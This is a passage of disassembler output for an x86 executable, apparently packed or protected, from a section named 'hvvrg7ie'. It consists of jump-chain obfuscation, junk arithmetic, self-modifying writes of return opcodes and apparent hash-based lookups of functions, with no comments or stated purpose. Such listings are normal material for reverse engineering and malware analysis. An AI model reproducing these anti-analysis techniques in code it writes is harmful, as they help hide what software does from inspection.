		jmp	sub_447883
; ---------------------------------------------------------------------------

locret_439A3A:				; CODE XREF: hvvrg7ie:loc_456E41j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456CD4

loc_439A3B:				; CODE XREF: sub_456CD4+Cj
		jmp	loc_4404BF
; END OF FUNCTION CHUNK	FOR sub_456CD4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44989C

loc_439A40:				; CODE XREF: sub_44989C+C52Bj
		jmp	nullsub_228
; END OF FUNCTION CHUNK	FOR sub_44989C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441B65

loc_439A45:				; CODE XREF: sub_441B65+Cj
		call	sub_43E7F3
		retn
; END OF FUNCTION CHUNK	FOR sub_441B65
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43AFB6

loc_439A4B:				; CODE XREF: sub_43AFB6:loc_448325j
		jmp	loc_44A148
; END OF FUNCTION CHUNK	FOR sub_43AFB6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458A57

loc_439A50:				; CODE XREF: sub_458A57j
		push	edx
		push	offset sub_451E9F
		jmp	nullsub_554
; END OF FUNCTION CHUNK	FOR sub_458A57
; ---------------------------------------------------------------------------

loc_439A5B:				; CODE XREF: hvvrg7ie:00450765j
		jnz	loc_454FB2
		jmp	loc_447227
; ---------------------------------------------------------------------------

loc_439A66:				; CODE XREF: hvvrg7ie:0043C9A0j
					; hvvrg7ie:0044E820j
		sbb	ebp, 0A9F37695h

; =============== S U B	R O U T	I N E =======================================



sub_439A6C	proc near		; CODE XREF: hvvrg7ie:0043A166p

; FUNCTION CHUNK AT 00443270 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00457C7D SIZE 00000005 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		push	ecx
		mov	ecx, eax
		jmp	loc_457C7D
sub_439A6C	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44398A

loc_439A78:				; CODE XREF: sub_44398A+16DB1j
		jnz	loc_44EC5D
		jmp	loc_45241E
; END OF FUNCTION CHUNK	FOR sub_44398A
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_496. PRESS KEYPAD	"+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_435. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440964

loc_439A85:				; CODE XREF: sub_440964+14j
		jmp	sub_45190C
; END OF FUNCTION CHUNK	FOR sub_440964
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44973C

loc_439A8A:				; CODE XREF: sub_44973C:loc_4475E2j
		mov	edx, ebp
		xchg	edx, [esp+4+var_4]
		mov	ebp, esp
		push	ebp
		mov	ebp, ecx
		jmp	loc_44A837
; END OF FUNCTION CHUNK	FOR sub_44973C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4465A6

loc_439A99:				; CODE XREF: sub_4465A6+12CAj
		jg	loc_445942
		sbb	edx, ebp
		xor	ebp, ecx

loc_439AA3:				; CODE XREF: sub_4465A6:loc_457B18j
		add	ecx, 0F7EF54F5h
		add	eax, ecx
		jmp	loc_43F016
; END OF FUNCTION CHUNK	FOR sub_4465A6
; ---------------------------------------------------------------------------

loc_439AB0:				; CODE XREF: hvvrg7ie:loc_4419FDj
					; hvvrg7ie:00441A15j
		add	eax, 813CF372h
		test	eax, 1000h
		jmp	loc_443ED2
; ---------------------------------------------------------------------------
		test	eax, 0C859A3BFh
		jmp	loc_45B719
; ---------------------------------------------------------------------------
		sbb	esi, ebp
		jmp	sub_440631
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45423F

loc_439AD4:				; CODE XREF: sub_45423F+6j
		jmp	loc_44C90C
; END OF FUNCTION CHUNK	FOR sub_45423F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442FD1

loc_439AD9:				; CODE XREF: sub_442FD1+10013j
		jmp	loc_439676
; END OF FUNCTION CHUNK	FOR sub_442FD1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44736C

loc_439ADE:				; CODE XREF: sub_44736C+18j
		jmp	loc_4397F4
; END OF FUNCTION CHUNK	FOR sub_44736C

; =============== S U B	R O U T	I N E =======================================



sub_439AE3	proc near		; CODE XREF: sub_45A234:loc_43DEF5p
					; sub_450F97-F930p ...

; FUNCTION CHUNK AT 00442087 SIZE 00000005 BYTES

		jb	sub_455B9C
		push	offset sub_444CF3
		jmp	loc_442087
sub_439AE3	endp

; ---------------------------------------------------------------------------

locret_439AF3:				; CODE XREF: hvvrg7ie:0044167Ej
		retn
; ---------------------------------------------------------------------------

loc_439AF4:				; CODE XREF: hvvrg7ie:00454C8Dj
		jmp	sub_446A16
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4413FF

loc_439AF9:				; CODE XREF: sub_4413FF+D12Fj
		jmp	sub_44973C
; END OF FUNCTION CHUNK	FOR sub_4413FF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_439AFE:				; CODE XREF: sub_43F227+1E8Fj
		jmp	loc_43D10A
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440631

loc_439B03:				; CODE XREF: sub_440631+Dj
		jmp	loc_455BF7
; END OF FUNCTION CHUNK	FOR sub_440631
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445CCD

loc_439B08:				; CODE XREF: sub_445CCD:loc_440519j
		add	eax, 0D1E856F5h
		sub	eax, 2A37A3F6h
		push	offset loc_4469BC
		jmp	loc_443180
; END OF FUNCTION CHUNK	FOR sub_445CCD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C05

loc_439B1E:				; CODE XREF: sub_440C05+1Fj
		jnz	loc_43BADE
		jmp	loc_444C64
; END OF FUNCTION CHUNK	FOR sub_440C05

; =============== S U B	R O U T	I N E =======================================



sub_439B29	proc near		; DATA XREF: sub_45B9BB-1CB5o

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043CEE5 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00440626 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00440CEA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442F06 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004434A7 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004451F2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446D31 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044ADD5 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044B9DD SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0045005C SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00452DA1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455B8A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00459C6A SIZE 0000001D BYTES

		add	edx, ebp
		add	edx, 53CD8599h
		mov	edx, [edx]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_44ADD5
		jmp	loc_446D31
sub_439B29	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454099

loc_439B42:				; CODE XREF: sub_454099+49D8j
		xchg	edx, [edi]
; END OF FUNCTION CHUNK	FOR sub_454099

; =============== S U B	R O U T	I N E =======================================



sub_439B44	proc near		; CODE XREF: sub_44D7AC:loc_451DC6p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00447B5A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D806 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0045B673 SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		pop	edi
		mov	byte ptr [eax],	0C3h
		jmp	loc_447B5A
sub_439B44	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_439B50:				; CODE XREF: hvvrg7ie:loc_4445C9j
		mov	eax, [esp]
		jmp	loc_43E6AA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447E56

loc_439B58:				; CODE XREF: sub_447E56+1j
		mov	ecx, eax
		xchg	ecx, [esp+4+var_4]
		push	0F6A42032h
		pop	eax
		rol	eax, 5
		test	eax, 2
		jmp	loc_453FFB
; END OF FUNCTION CHUNK	FOR sub_447E56
; ---------------------------------------------------------------------------

loc_439B71:				; CODE XREF: hvvrg7ie:004505B3j
		jnb	loc_459884
		xor	ebp, ebx
		sbb	ebp, edx
		jmp	loc_445658
; ---------------------------------------------------------------------------

loc_439B80:				; CODE XREF: hvvrg7ie:loc_450057j
		shl	eax, 3
		mov	edx, [ebp+8]
		jmp	loc_448E3D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450D8D

loc_439B8B:				; CODE XREF: sub_450D8D:loc_446B1Ej
		cmp	dword ptr [ebp-10h], 0
		jnz	loc_4454F2
		mov	eax, [ebp+8]
		push	offset sub_43AB22
		jmp	loc_45A916
; END OF FUNCTION CHUNK	FOR sub_450D8D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456FE7

loc_439BA2:				; CODE XREF: sub_456FE7:loc_43ECA0j
		mov	edx, [ebp-20h]
		movzx	edx, byte ptr [edx]
		or	eax, edx
		mov	[ebp-1Ch], eax

loc_439BAD:				; CODE XREF: sub_43FC1D:loc_44AB69j
		inc	dword ptr [ebp-20h]
		jmp	loc_4532DF
; END OF FUNCTION CHUNK	FOR sub_456FE7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45943A

loc_439BB5:				; CODE XREF: hvvrg7ie:loc_453E7Aj
					; sub_45943A:loc_459456j
		jz	loc_44DB3F
		sbb	ecx, 0DF998B71h
		test	ecx, 6BE475BCh
		jmp	loc_457AFC
; END OF FUNCTION CHUNK	FOR sub_45943A
; ---------------------------------------------------------------------------

locret_439BCC:				; CODE XREF: hvvrg7ie:004402E8j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43A319

loc_439BCD:				; CODE XREF: sub_43A319+1BD3Dj
		jmp	sub_44D2C6
; END OF FUNCTION CHUNK	FOR sub_43A319
; ---------------------------------------------------------------------------

loc_439BD2:				; CODE XREF: hvvrg7ie:loc_43B896j
		mov	byte ptr [eax],	0C3h
		jmp	loc_451A2C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44191F

loc_439BDA:				; CODE XREF: sub_44191F+F4C4j
		call	sub_443163
; END OF FUNCTION CHUNK	FOR sub_44191F
; START	OF FUNCTION CHUNK FOR sub_450434

loc_439BDF:				; CODE XREF: sub_450434+14FCj
		jmp	loc_452827
; END OF FUNCTION CHUNK	FOR sub_450434
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4413FF

loc_439BE4:				; CODE XREF: sub_4413FF+8j
		jmp	loc_44E51C
; END OF FUNCTION CHUNK	FOR sub_4413FF
; ---------------------------------------------------------------------------
		or	ebx, 4F99D1C4h
		jmp	sub_43E063
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E533

loc_439BF4:				; CODE XREF: sub_44E533:loc_44A5A5j
		xor	ebx, 1CBC4B7h
		jmp	loc_456710
; END OF FUNCTION CHUNK	FOR sub_44E533
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C0DE

loc_439BFF:				; CODE XREF: sub_43C0DE+1E028j
		push	offset sub_458082
		jmp	loc_451F32
; END OF FUNCTION CHUNK	FOR sub_43C0DE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4405D7

loc_439C09:				; CODE XREF: sub_4405D7:loc_44D2E6j
		cmp	eax, 0C2887784h
		jmp	loc_451A80
; END OF FUNCTION CHUNK	FOR sub_4405D7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C5D0

loc_439C14:				; CODE XREF: sub_44C5D0:loc_449D89j
		mov	ds:off_41D1F4, eax
		lea	eax, sub_43F272
		mov	byte ptr [eax],	0C3h
		jmp	sub_43F272
; END OF FUNCTION CHUNK	FOR sub_44C5D0

; =============== S U B	R O U T	I N E =======================================



sub_439C28	proc near		; CODE XREF: sub_419430+94p
					; hvvrg7ie:0044D7FBj
					; DATA XREF: ...

arg_8		= dword	ptr  0Ch
arg_C		= dword	ptr  10h

; FUNCTION CHUNK AT 0044AEFD SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0045A1FE SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0045A4FF SIZE 00000005 BYTES

		call	sub_454451

loc_439C2D:				; CODE XREF: sub_44EDF0+Bj
		and	ebx, 19ACBF1Dh
		add	ebx, 17376DA8h
		popf
		add	edx, ebx
		pop	ebx
		sbb	eax, ecx
		pop	ecx
		jmp	loc_45A1FE
sub_439C28	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D980

loc_439C45:				; CODE XREF: sub_43D980-1B25j
		jb	loc_43B800

loc_439C4B:				; CODE XREF: sub_44B3D0+DE4Aj
		jmp	loc_44D282
; END OF FUNCTION CHUNK	FOR sub_43D980
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444C9C

loc_439C50:				; CODE XREF: sub_444C9C+Cj
		jmp	loc_43B310
; END OF FUNCTION CHUNK	FOR sub_444C9C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D052

loc_439C55:				; CODE XREF: sub_43D052+14j
		jmp	nullsub_32
; END OF FUNCTION CHUNK	FOR sub_43D052
; ---------------------------------------------------------------------------
		sbb	eax, 32A97663h
		push	0A41AC7Ch
		cmp	edx, ebp
		jmp	loc_43F16C
; ---------------------------------------------------------------------------

loc_439C6C:				; CODE XREF: hvvrg7ie:0044541Fj
		push	10D33461h
		pop	ebx
		rol	ebx, 0Ah
		xor	ebx, 0F5EBA976h
		test	ebx, 1000h
		jmp	loc_44C0C4
; ---------------------------------------------------------------------------

loc_439C86:				; CODE XREF: hvvrg7ie:0044B931j
		cmp	edi, 87690B2h
		jmp	loc_44DDE7
; ---------------------------------------------------------------------------
		db 2Dh,	9Eh, 20h
dword_439C94	dd 0			; DATA XREF: sub_453405-167CEr
					; hvvrg7ie:0044A681w ...
dword_439C98	dd 0			; DATA XREF: hvvrg7ie:0043D5F2w
					; sub_452AE5-1C2r
; ---------------------------------------------------------------------------

loc_439C9C:				; CODE XREF: hvvrg7ie:0043D088j
		jmp	sub_446A16
; ---------------------------------------------------------------------------
		db 8Dh,	0D7h, 0DDh
dword_439CA4	dd 0			; DATA XREF: sub_44D149:loc_452E63w
					; sub_45A0B1-4BF9r
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450D8D

loc_439CA8:				; CODE XREF: sub_450D8D+11j
		jmp	loc_44C718
; END OF FUNCTION CHUNK	FOR sub_450D8D
; ---------------------------------------------------------------------------
		db 3Ch,	0B1h, 5
dword_439CB0	dd 0			; DATA XREF: sub_44AB90+6r
					; sub_44AB90:loc_45B2BEw
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FE9B

loc_439CB4:				; CODE XREF: sub_43FE9B+828Fj
		jmp	loc_443618
; END OF FUNCTION CHUNK	FOR sub_43FE9B
; ---------------------------------------------------------------------------
		db 6Ch,	2 dup(95h)
dword_439CBC	dd 0			; DATA XREF: hvvrg7ie:00453C2Dw
					; hvvrg7ie:0045A1F1r
dword_439CC0	dd 0			; DATA XREF: sub_442B3C+Ar
					; hvvrg7ie:0044E80Ew
; ---------------------------------------------------------------------------

loc_439CC4:				; CODE XREF: hvvrg7ie:004574B6j
		jmp	loc_43D5CB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44059F

loc_439CC9:				; CODE XREF: sub_44059F+F00j
		jmp	loc_454AB4
; END OF FUNCTION CHUNK	FOR sub_44059F
; ---------------------------------------------------------------------------

loc_439CCE:				; CODE XREF: hvvrg7ie:loc_43A5B7j
		jmp	loc_43D785
; ---------------------------------------------------------------------------
		db 63h
dword_439CD4	dd 0			; DATA XREF: hvvrg7ie:0043D921w
					; sub_45048C+3w ...
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441167

loc_439CD8:				; CODE XREF: sub_441167+19DE9j
		jmp	loc_459767
; END OF FUNCTION CHUNK	FOR sub_441167
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444BE1

loc_439CDD:				; CODE XREF: sub_444BE1+94CCj
		mov	edx, 0BE8CE1B7h
		push	ecx

loc_439CE3:				; CODE XREF: hvvrg7ie:loc_44FA14j
		push	2984FBE3h
		pop	ecx
		rol	ecx, 1Fh
		jmp	loc_43E6FB
; END OF FUNCTION CHUNK	FOR sub_444BE1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441DAA

loc_439CF1:				; CODE XREF: sub_441DAA:loc_450A65j
		push	offset sub_44432F
		jmp	nullsub_125
; END OF FUNCTION CHUNK	FOR sub_441DAA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B048

loc_439CFB:				; CODE XREF: sub_45B048-2557j
		jz	sub_43B914
		jmp	loc_45461D
; END OF FUNCTION CHUNK	FOR sub_45B048
; ---------------------------------------------------------------------------

loc_439D06:				; CODE XREF: hvvrg7ie:loc_43DB8Bj
		jge	loc_457C51
; START	OF FUNCTION CHUNK FOR sub_4429CE

loc_439D0C:				; CODE XREF: sub_4429CE+12j
		jmp	loc_447539
; END OF FUNCTION CHUNK	FOR sub_4429CE
; ---------------------------------------------------------------------------
		or	edi, edx
		test	ebp, eax
		jmp	loc_45B3A2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E128

loc_439D1A:				; CODE XREF: sub_43E128+1B401j
		jnz	loc_456BBA

loc_439D20:				; CODE XREF: sub_43BA2E+Ej
		jmp	nullsub_421
; END OF FUNCTION CHUNK	FOR sub_43E128
; ---------------------------------------------------------------------------
		push	edi
		or	ebp, edi
		push	ebp
		sbb	esi, edi
		jmp	loc_456BBA
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_405. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		push	offset loc_442EFE
		jmp	loc_43AA06
; ---------------------------------------------------------------------------

loc_439D3B:				; CODE XREF: hvvrg7ie:0043EA8Aj
		jnp	loc_4532B7
; START	OF FUNCTION CHUNK FOR sub_43DB4C

loc_439D41:				; CODE XREF: sub_43DB4C:loc_4409C7j
		xor	edx, 32006B96h
		push	esi
		pushf
		call	sub_44BF37
; END OF FUNCTION CHUNK	FOR sub_43DB4C
; START	OF FUNCTION CHUNK FOR sub_43FC15

loc_439D4E:				; CODE XREF: sub_43FC15+1128Aj
		sub	ebx, 0E675A6BCh
		adc	esi, 0CD8B28B7h
		mov	[edx], eax
		xchg	ecx, [edx]

loc_439D5E:				; CODE XREF: sub_43FC15:loc_458104j
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_459DEF
		jmp	loc_43F662
; END OF FUNCTION CHUNK	FOR sub_43FC15
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458F33

loc_439D6F:				; CODE XREF: sub_43D964+1736Dj
					; sub_458F33:loc_458F38j
		push	0C4EB6703h
		and	eax, 97166EFCh

loc_439D7A:				; CODE XREF: sub_454099:loc_4596C9j
		jmp	loc_4513B9
; END OF FUNCTION CHUNK	FOR sub_458F33

; =============== S U B	R O U T	I N E =======================================



sub_439D7F	proc near		; DATA XREF: hvvrg7ie:0044BF11o
		mov	ds:off_41D038, eax
		lea	eax, loc_453328
		mov	byte ptr [eax],	0C3h
		jmp	loc_453328
sub_439D7F	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A2CE

loc_439D93:				; CODE XREF: sub_45A2CE:loc_453328j
		xchg	edi, [esp+4+var_4]
		mov	edx, edi
		pop	edi
		jmp	loc_44B801
; END OF FUNCTION CHUNK	FOR sub_45A2CE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446297

loc_439D9E:				; CODE XREF: sub_446297:loc_4462B3j
		and	eax, 0D0075648h
		add	eax, 0FB91B67Dh
		and	eax, 3F7CAE93h
		test	eax, 40000h
		jmp	loc_45644F
; END OF FUNCTION CHUNK	FOR sub_446297
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445CCD

loc_439DBB:				; CODE XREF: sub_445CCD+A4C6j
		push	edx
		push	0A3810376h
		pop	edx
		add	edx, 0A80479C4h
		and	edx, 0B099D088h
		add	edx, 0FFC37A5Dh
		jmp	loc_443B8B
; END OF FUNCTION CHUNK	FOR sub_445CCD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D809

loc_439DD9:				; CODE XREF: sub_43D809+10j
		call	sub_446D8D
		mov	eax, 5BE2C7B9h
		call	sub_450C5A
		mov	ds:off_41D11C, eax
		jmp	loc_4430C4
; END OF FUNCTION CHUNK	FOR sub_43D809
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450434

loc_439DF3:				; CODE XREF: sub_450434:loc_43936Bj
		and	eax, 0C88AB028h
		cdq
		jo	loc_445162
		jmp	loc_43F1DC
; END OF FUNCTION CHUNK	FOR sub_450434
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AC6E

loc_439E05:				; CODE XREF: sub_44AC6E:loc_45AB69j
		call	sub_457740
; END OF FUNCTION CHUNK	FOR sub_44AC6E
; START	OF FUNCTION CHUNK FOR sub_439FEE

loc_439E0A:				; CODE XREF: sub_439FEE+14D00j
		jmp	loc_452A4D
; END OF FUNCTION CHUNK	FOR sub_439FEE
; ---------------------------------------------------------------------------
		mov	ds:off_41D030, eax
		lea	eax, sub_439E6C
		mov	byte ptr [eax],	0C3h
		jmp	loc_43D203

; =============== S U B	R O U T	I N E =======================================



sub_439E23	proc near		; CODE XREF: sub_41A025+19p
					; sub_439E23+5j
					; DATA XREF: ...
		call	sub_43F98C
		jmp	ds:off_41D034
sub_439E23	endp

; ---------------------------------------------------------------------------

loc_439E2E:				; CODE XREF: hvvrg7ie:00441B1Bj
		jmp	loc_44AAE0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A234

loc_439E33:				; CODE XREF: sub_45A234-1E290j
		jmp	loc_4456C2
; END OF FUNCTION CHUNK	FOR sub_45A234
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459B45

loc_439E38:				; CODE XREF: sub_459B45:loc_458D7Cj
		jnz	loc_4415ED

loc_439E3E:				; CODE XREF: sub_44C2EA+32D7j
		jmp	loc_458394
; END OF FUNCTION CHUNK	FOR sub_459B45
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44432F

loc_439E43:				; CODE XREF: sub_44432F+13j
		jmp	loc_452250
; END OF FUNCTION CHUNK	FOR sub_44432F
; ---------------------------------------------------------------------------
		not	eax
		xchg	esi, [ebp+0]
		jmp	loc_4415E4
; ---------------------------------------------------------------------------

loc_439E52:				; DATA XREF: sub_4413A5:loc_45A324o
		call	sub_43E7F3
		retn
; ---------------------------------------------------------------------------
dword_439E58	dd 0			; DATA XREF: sub_449CB1:loc_4436D6r

; =============== S U B	R O U T	I N E =======================================



sub_439E5C	proc near		; CODE XREF: sub_41A690+299p
					; sub_439E5C+5j
					; DATA XREF: ...
		call	sub_439E6C
		jmp	ds:off_41D030
sub_439E5C	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A6B5

loc_439E67:				; CODE XREF: sub_44A6B5+1Cj
		jmp	loc_43D35A
; END OF FUNCTION CHUNK	FOR sub_44A6B5

; =============== S U B	R O U T	I N E =======================================



sub_439E6C	proc near		; CODE XREF: sub_439E5Cp
					; hvvrg7ie:loc_43D203j	...

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043ADDD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440A75 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044172B SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004451A1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045756B SIZE 00000023 BYTES
; FUNCTION CHUNK AT 00457D91 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00458C1E SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0045A82C SIZE 00000005 BYTES

		jb	loc_457D91
		xchg	ecx, [esp+0]
		mov	edx, ecx
		jmp	loc_4451A1
sub_439E6C	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450E01

loc_439E7C:				; CODE XREF: sub_450E01-CEF8j
		jg	loc_45948E

loc_439E82:				; CODE XREF: sub_453BBD:loc_455249j
		push	eax
		push	offset sub_456FF3
		jmp	loc_450D6D
; END OF FUNCTION CHUNK	FOR sub_450E01
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443BCD

loc_439E8D:				; CODE XREF: sub_443BCD+6A6j
		jnp	loc_456DFF
		jp	loc_443A04
		adc	edx, ebx
		jmp	loc_44AD2E
; END OF FUNCTION CHUNK	FOR sub_443BCD
; ---------------------------------------------------------------------------

loc_439EA0:				; CODE XREF: hvvrg7ie:loc_44C17Fj
		xchg	esi, [esp]
		push	esi
		push	73B85AB2h
		pop	esi
		sub	esi, 16A7D431h
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_439EB0:				; CODE XREF: sub_43F227:loc_4436BAj
		and	esi, 0AE333579h
		or	esi, 1C5CBC90h
		jmp	loc_451088
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4465A6

loc_439EC1:				; CODE XREF: sub_4465A6-48EBj
		jz	loc_4442A2

loc_439EC7:				; CODE XREF: sub_44C1F3+6306j
		jmp	loc_43E344
; END OF FUNCTION CHUNK	FOR sub_4465A6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4544DD

loc_439ECC:				; CODE XREF: sub_4544DD-F51Cj
		jmp	loc_4510E1
; END OF FUNCTION CHUNK	FOR sub_4544DD
; ---------------------------------------------------------------------------
		jnp	loc_454364
		not	edi
		and	edi, eax
		jmp	loc_43F9D1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44004A

loc_439EE0:				; CODE XREF: sub_44004A+Aj
		add	edx, ebp
		add	edx, 15E11745h
		mov	[edx], eax
		pop	edx
		jmp	loc_43DA4D
; END OF FUNCTION CHUNK	FOR sub_44004A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439190

loc_439EF0:				; CODE XREF: sub_439190+Fj
		add	edx, 0F79A86E9h
		mov	[edx], eax
		pop	edx
		lea	eax, loc_43F93F
		jmp	loc_43DCEB
; END OF FUNCTION CHUNK	FOR sub_439190
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455ADC

loc_439F04:				; CODE XREF: sub_455ADC+18j
		pop	esi
		or	esi, 86E0091Fh
		add	esi, 6E0855B5h
		add	esi, ebp
		push	offset sub_459B2D
		jmp	loc_4574D1
; END OF FUNCTION CHUNK	FOR sub_455ADC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443B00

loc_439F1D:				; CODE XREF: sub_443B00-1EEj
		rol	eax, 19h
		cmp	eax, 0E04D92D9h
		jmp	loc_44D9C7
; END OF FUNCTION CHUNK	FOR sub_443B00
; ---------------------------------------------------------------------------
		mov	ds:dword_41D188, eax
		lea	eax, nullsub_486
		call	sub_43CAA5
; START	OF FUNCTION CHUNK FOR sub_453BBD

loc_439F3C:				; CODE XREF: sub_453BBD+95Dj
		jmp	loc_455249
; END OF FUNCTION CHUNK	FOR sub_453BBD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451E6D

loc_439F41:				; CODE XREF: sub_451E6D-D866j
		jmp	loc_441589
; END OF FUNCTION CHUNK	FOR sub_451E6D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444593

loc_439F46:				; CODE XREF: sub_444593+Cj
		jmp	loc_44525A
; END OF FUNCTION CHUNK	FOR sub_444593
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45889B

loc_439F4B:				; CODE XREF: sub_45889B-1B49Fj
		jmp	loc_44AC30
; END OF FUNCTION CHUNK	FOR sub_45889B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B6A5

loc_439F50:				; CODE XREF: sub_450A7A:loc_455E1Fj
					; sub_43B6A5+1F65Dj
		or	ebp, edx

loc_439F52:				; CODE XREF: sub_43B6A5:loc_442C48j
		mov	eax, 1D403CB1h
		call	sub_44059F
		rol	eax, 19h
		sub	eax, 48E23498h
		jmp	loc_439647
; END OF FUNCTION CHUNK	FOR sub_43B6A5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C0DE

loc_439F6A:				; CODE XREF: sub_43C0DEj
		mov	eax, ds:dword_4563B8
		jmp	loc_44954F
; END OF FUNCTION CHUNK	FOR sub_43C0DE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458D28

loc_439F75:				; CODE XREF: sub_458D28-2482j
